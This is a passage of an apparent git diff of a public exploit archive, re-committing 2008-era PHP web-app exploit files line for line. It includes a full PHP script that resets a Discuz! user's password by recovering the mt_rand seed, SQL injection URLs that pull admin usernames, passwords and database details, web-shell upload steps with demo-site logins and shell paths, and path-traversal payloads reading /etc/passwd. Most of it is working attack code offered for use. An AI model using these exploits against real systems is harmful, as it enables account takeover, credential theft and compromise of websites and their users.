-error_reporting(7);
-ini_set('max_execution_time', 0);
-
-$host = $argv[1];
-$path = $argv[2];
-$user = $argv[3];
-$mail = $argv[4];
-$uid = $argv[5];
-
-$fp = fsockopen($host, 80);
-
-$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Keep-Alive: 300\r\n";
-$data .= "Connection: keep-alive\r\n\r\n";
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp)) {
-$resp .= fread($fp, 1024);
-preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
-if ($hash)
-break;
-}
-
-if ($hash) {
-$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
-$data = "POST ".$path."member.php HTTP/1.1\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "Referer: http://$host$path\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Content-Length: ".strlen($cmd)."\r\n";
-$data .= "Connection: close\r\n\r\n";
-$data .= $cmd;
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp))
-$resp .= fread($fp, 1024);
-
-fclose($fp);
-
-preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
-
-if (!$sid)
-exit("Exploit Failed!\n");
-
-$seed = getseed();
-if ($seed) {
-mt_srand($seed);
-random();
-mt_rand();
-$id = random();
-
-$fp = fsockopen($host, 80);
-
-$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
-$data = "POST ".$path."member.php HTTP/1.1\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "Referer: http://$host$path\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Content-Length: ".strlen($cmd)."\r\n";
-$data .= "Connection: close\r\n\r\n";
-$data .= $cmd;
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp))
-$resp .= fread($fp, 1024);
-
-if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
-exit("Expoilt Success!\nUser New Password:\t123456\n");
-else
-exit("Exploit Failed!\n");
-} else
-exit("Exploit Failed!\n");
-} else
-exit("Exploit Failed!\n");
-
-function getseed()
-{
-global $sid;
-
-for ($seed = 0; $seed <= 1000000; $seed ++) {
-mt_srand($seed);
-$id = random(6);
-if ($id == $sid[1])
-return $seed;
-}
-return false;
-}
-
-function random($length = 6)
-{
-$hash = '';
-$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
-$max = strlen($chars) - 1;
-for ($i = 0; $i < $length; $i ++)
-$hash .= $chars[mt_rand(0, $max)];
-
-return $hash;
-}
-
-?>
-
-# milw0rm.com [2008-11-22]
+#!/usr/bin/php
+<?php
+
+print_r('
++---------------------------------------------------------------------------+
+Discuz! Reset User Password Exploit
+by 80vul
+team: http://www.80vul.com
++---------------------------------------------------------------------------+
+');
+
+if ($argc < 6) {
+print_r('
++---------------------------------------------------------------------------+
+Usage: php '.$argv[0].' host path user mail uid
+host: target server (ip/hostname)
+path: path to discuz
+user: user login name
+mail: user login mail
+uid: user login id
+Example:
+php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
++---------------------------------------------------------------------------+
+');
+exit;
+}
+
+error_reporting(7);
+ini_set('max_execution_time', 0);
+
+$host = $argv[1];
+$path = $argv[2];
+$user = $argv[3];
+$mail = $argv[4];
+$uid = $argv[5];
+
+$fp = fsockopen($host, 80);
+
+$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Keep-Alive: 300\r\n";
+$data .= "Connection: keep-alive\r\n\r\n";
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp)) {
+$resp .= fread($fp, 1024);
+preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
+if ($hash)
+break;
+}
+
+if ($hash) {
+$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
+$data = "POST ".$path."member.php HTTP/1.1\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "Referer: http://$host$path\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Content-Length: ".strlen($cmd)."\r\n";
+$data .= "Connection: close\r\n\r\n";
+$data .= $cmd;
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp))
+$resp .= fread($fp, 1024);
+
+fclose($fp);
+
+preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
+
+if (!$sid)
+exit("Exploit Failed!\n");
+
+$seed = getseed();
+if ($seed) {
+mt_srand($seed);
+random();
+mt_rand();
+$id = random();
+
+$fp = fsockopen($host, 80);
+
+$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
+$data = "POST ".$path."member.php HTTP/1.1\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "Referer: http://$host$path\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Content-Length: ".strlen($cmd)."\r\n";
+$data .= "Connection: close\r\n\r\n";
+$data .= $cmd;
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp))
+$resp .= fread($fp, 1024);
+
+if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
+exit("Expoilt Success!\nUser New Password:\t123456\n");
+else
+exit("Exploit Failed!\n");
+} else
+exit("Exploit Failed!\n");
+} else
+exit("Exploit Failed!\n");
+
+function getseed()
+{
+global $sid;
+
+for ($seed = 0; $seed <= 1000000; $seed ++) {
+mt_srand($seed);
+$id = random(6);
+if ($id == $sid[1])
+return $seed;
+}
+return false;
+}
+
+function random($length = 6)
+{
+$hash = '';
+$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
+$max = strlen($chars) - 1;
+for ($i = 0; $i < $length; $i ++)
+$hash .= $chars[mt_rand(0, $max)];
+
+return $hash;
+}
+
+?>
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7186.txt b/platforms/php/webapps/7186.txt
index e5ff8c845..d6bd1d5fd 100755
--- a/platforms/php/webapps/7186.txt
+++ b/platforms/php/webapps/7186.txt
@@ -1,36 +1,36 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Vlog System V1.1 ( blog.php user )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-11-22]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Vlog System V1.1 ( blog.php user )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7188.txt b/platforms/php/webapps/7188.txt
index 6a0456407..28e1af7da 100755
--- a/platforms/php/webapps/7188.txt
+++ b/platforms/php/webapps/7188.txt
@@ -1,42 +1,42 @@
-[~] geta php Real Estate Remote File upload
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
-[~]
-[~] Date: 22.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-first register to site 
-
-login to site and edit your profile
-
-upload your_shell.php 
-
-your_shell.php path:
-
-localhost/script/re_images/[ID]_logo_your_shell.php
-
-example for demo:
-
-login: http://www.getaphpsite.com/demos/realty/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-22]
+[~] geta php Real Estate Remote File upload
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
+[~]
+[~] Date: 22.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+first register to site 
+
+login to site and edit your profile
+
+upload your_shell.php 
+
+your_shell.php path:
+
+localhost/script/re_images/[ID]_logo_your_shell.php
+
+example for demo:
+
+login: http://www.getaphpsite.com/demos/realty/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7189.txt b/platforms/php/webapps/7189.txt
index 47c855dd5..5bad242bf 100755
--- a/platforms/php/webapps/7189.txt
+++ b/platforms/php/webapps/7189.txt
@@ -1,42 +1,42 @@
-[~] geta php cardealers Remote File upload
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
-[~]
-[~] Date: 22.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-first register to site 
-
-login to site and edit your profile
-
-upload your_shell.php 
-
-your_shell.php path:
-
-localhost/script/re_images/[ID]_logo_your_shell.php
-
-example for demo:
-
-login: http://www.getaphpsite.com/demos/cardealers/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-22]
+[~] geta php cardealers Remote File upload
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
+[~]
+[~] Date: 22.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+first register to site 
+
+login to site and edit your profile
+
+upload your_shell.php 
+
+your_shell.php path:
+
+localhost/script/re_images/[ID]_logo_your_shell.php
+
+example for demo:
+
+login: http://www.getaphpsite.com/demos/cardealers/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7190.txt b/platforms/php/webapps/7190.txt
index b213028e3..65abd11a1 100755
--- a/platforms/php/webapps/7190.txt
+++ b/platforms/php/webapps/7190.txt
@@ -1,56 +1,56 @@
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-        +                                                                    +
-        +            Ez Ringtone Manager Multiple Vulnerabilities            +
-        +                                                                    +
-        +                      Discovered by b3hz4d                          +
-        +                                                                    +
-        +                      WwW.DeltaHacking.Net                          +
-        +                                                                    +
-        +                                                                    +
-        +                                                                    +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-                                  
-
-                              APA Center of Yazd University   
-                                 (https://www.ircert.cc)    
-
-		
-AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
-DATE   : 22 nov 2008
-SITE   : WwW.DeltaHacking.Net
-
-
-#####################################################
-
-APPLICATION  : Ez Ringtone Manager
-DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
-VENDOR       : http://www.scriptsez.net/
-DEMO         : http://demo.scriptsez.net/ringtones/demo.html
-
-#####################################################
-
-
-[+] vuln    : ./main.php
-              ./template.php
-
-
-               vulnerability is in main.php that included in template.php
-
-
-[1] Remote File Disclosure:
-
-[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
-              http://victim.com/ringtones/template.php?action=detail&id=../admin.php
-
-[2] Local File Inclusion:
-
-[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
-              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
-
-##########################################################################################################
-
-# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #
-
-##########################################################################################################
-
-# milw0rm.com [2008-11-22]
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        +                                                                    +
+        +            Ez Ringtone Manager Multiple Vulnerabilities            +
+        +                                                                    +
+        +                      Discovered by b3hz4d                          +
+        +                                                                    +
+        +                      WwW.DeltaHacking.Net                          +
+        +                                                                    +
+        +                                                                    +
+        +                                                                    +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                  
+
+                              APA Center of Yazd University   
+                                 (https://www.ircert.cc)    
+
+		
+AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
+DATE   : 22 nov 2008
+SITE   : WwW.DeltaHacking.Net
+
+
+#####################################################
+
+APPLICATION  : Ez Ringtone Manager
+DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
+VENDOR       : http://www.scriptsez.net/
+DEMO         : http://demo.scriptsez.net/ringtones/demo.html
+
+#####################################################
+
+
+[+] vuln    : ./main.php
+              ./template.php
+
+
+               vulnerability is in main.php that included in template.php
+
+
+[1] Remote File Disclosure:
+
+[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
+              http://victim.com/ringtones/template.php?action=detail&id=../admin.php
+
+[2] Local File Inclusion:
+
+[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
+              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
+
+##########################################################################################################
+
+# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #
+
+##########################################################################################################
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7195.txt b/platforms/php/webapps/7195.txt
index 557940e38..c7ada30ec 100755
--- a/platforms/php/webapps/7195.txt
+++ b/platforms/php/webapps/7195.txt
@@ -1,34 +1,34 @@
-==================================================================================================================
-=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
-=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
-+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
-=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
-=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
-===================================================SNAKES TEAM====================================================
-+                                                                                                                =
-=              	                    Script:hostindex  Remote SQL Injection Vulnerability                         +
-+                                                                                                                =
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
-                =                                                                                    =
-                                    :::::Mail: snakespc@gmail.com:::::::             
-                =                                                                                    =
-                =          = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::=           =
-                =                                                                                    =
-                =                          Script site: turnkeyzone.com   "directory.php"            =
-                  ===================================Snakespc======================================
-
-Exploit:
-http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
-********
-demo:
-http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
-===================================================================================================================
-
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/SC >>>> Members 
-Str0ke ....Milxw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-23]
+==================================================================================================================
+=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
+=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
++         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
+=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
+=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
+===================================================SNAKES TEAM====================================================
++                                                                                                                =
+=              	                    Script:hostindex  Remote SQL Injection Vulnerability                         +
++                                                                                                                =
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
+                =                                                                                    =
+                                    :::::Mail: snakespc@gmail.com:::::::             
+                =                                                                                    =
+                =          = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::=           =
+                =                                                                                    =
+                =                          Script site: turnkeyzone.com   "directory.php"            =
+                  ===================================Snakespc======================================
+
+Exploit:
+http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
+********
+demo:
+http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
+===================================================================================================================
+
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/SC >>>> Members 
+Str0ke ....Milxw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7197.txt b/platforms/php/webapps/7197.txt
index 2151b79ea..784fe6315 100755
--- a/platforms/php/webapps/7197.txt
+++ b/platforms/php/webapps/7197.txt
@@ -1,21 +1,21 @@
--============================================-
-Autore: x0r - Evolution Team
-Msn: andry2000@hotmail.it
-Cms: Goople Cms 1.7
-Bug: Arbitrary File Upload
-Download:
-http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
--============================================-
-Exploit:
-
-Logg youself like a normal user, and then go to:
-
-/win/content/upload.php and upload your php shell
-
-after go to: /user/doc/shell.php
-
-Greetz: Amore mio sono 47 giorni che stiamo insieme, 47 giorni
-fantastici...sei la mia vita... A + M = L O V E
-        Ti Amo Bimba Mia... 8\10\2008
-
-# milw0rm.com [2008-11-23]
+-============================================-
+Autore: x0r - Evolution Team
+Msn: andry2000@hotmail.it
+Cms: Goople Cms 1.7
+Bug: Arbitrary File Upload
+Download:
+http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
+-============================================-
+Exploit:
+
+Logg youself like a normal user, and then go to:
+
+/win/content/upload.php and upload your php shell
+
+after go to: /user/doc/shell.php
+
+Greetz: Amore mio sono 47 giorni che stiamo insieme, 47 giorni
+fantastici...sei la mia vita... A + M = L O V E
+        Ti Amo Bimba Mia... 8\10\2008
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7198.txt b/platforms/php/webapps/7198.txt
index c020e6f92..005f24e7c 100755
--- a/platforms/php/webapps/7198.txt
+++ b/platforms/php/webapps/7198.txt
@@ -1,34 +1,34 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-                                                                                       
-                             Script: NetArtMedia Cars Portal Remote SQL Injection Vulnerability                                   
-                                                                                                              
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
-                =                                                                                    =
-                =           Sript : http://www.netartmedia.net/carsportal/                 =
-                =                               www.netartmedia.net                                  =              
-                 =================================== Snakespc ======================================    
-
-
-[*]Exploit:
-Using FireFox
-view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users--
-                                                                   
-===================================================================================================================
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/sc >>>> Members 
-str0ke.....>>>>.....milw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-23]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
+                                                                                       
+                             Script: NetArtMedia Cars Portal Remote SQL Injection Vulnerability                                   
+                                                                                                              
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
+                =                                                                                    =
+                =           Sript : http://www.netartmedia.net/carsportal/                 =
+                =                               www.netartmedia.net                                  =              
+                 =================================== Snakespc ======================================    
+
+
+[*]Exploit:
+Using FireFox
+view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users--
+                                                                   
+===================================================================================================================
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/sc >>>> Members 
+str0ke.....>>>>.....milw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7199.txt b/platforms/php/webapps/7199.txt
index 6ac37229d..99285f834 100755
--- a/platforms/php/webapps/7199.txt
+++ b/platforms/php/webapps/7199.txt
@@ -1,34 +1,34 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-                                                                                       
-                             Script: NetArtMedia blog system Remote SQL Injection Vulnerability                                   
-                                                                                                              
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
-                =                                                                                    =
-                =           Sript : http://www.netartmedia.net/blogsystem/                 =
-                =                               www.netartmedia.net                                  =              
-                 =================================== Snakespc ======================================    
-
-
-[*]Exploit:
-Using FireFox
-view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users--
-                                                                   
-===================================================================================================================
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/sc >>>> Members 
-str0ke.....>>>>.....milw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-23]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
+                                                                                       
+                             Script: NetArtMedia blog system Remote SQL Injection Vulnerability                                   
+                                                                                                              
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
+                =                                                                                    =
+                =           Sript : http://www.netartmedia.net/blogsystem/                 =
+                =                               www.netartmedia.net                                  =              
+                 =================================== Snakespc ======================================    
+
+
+[*]Exploit:
+Using FireFox
+view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users--
+                                                                   
+===================================================================================================================
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/sc >>>> Members 
+str0ke.....>>>>.....milw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/720.pl b/platforms/php/webapps/720.pl
index 8d583cc05..b6a11b288 100755
--- a/platforms/php/webapps/720.pl
+++ b/platforms/php/webapps/720.pl
@@ -94,6 +94,6 @@ for($a=0;$a<=$b;$a++)
 $sitevul = $vul[$a].$cmd;
 if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; }
 $res = get($sitevul) or next;
-}
-
-# milw0rm.com [2004-12-25]
+}
+
+# milw0rm.com [2004-12-25]
diff --git a/platforms/php/webapps/7200.txt b/platforms/php/webapps/7200.txt
index f3ad342b7..f0d72dcf8 100755
--- a/platforms/php/webapps/7200.txt
+++ b/platforms/php/webapps/7200.txt
@@ -1,43 +1,43 @@
-[~] PG Real Estate Solution Auth Bypass
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
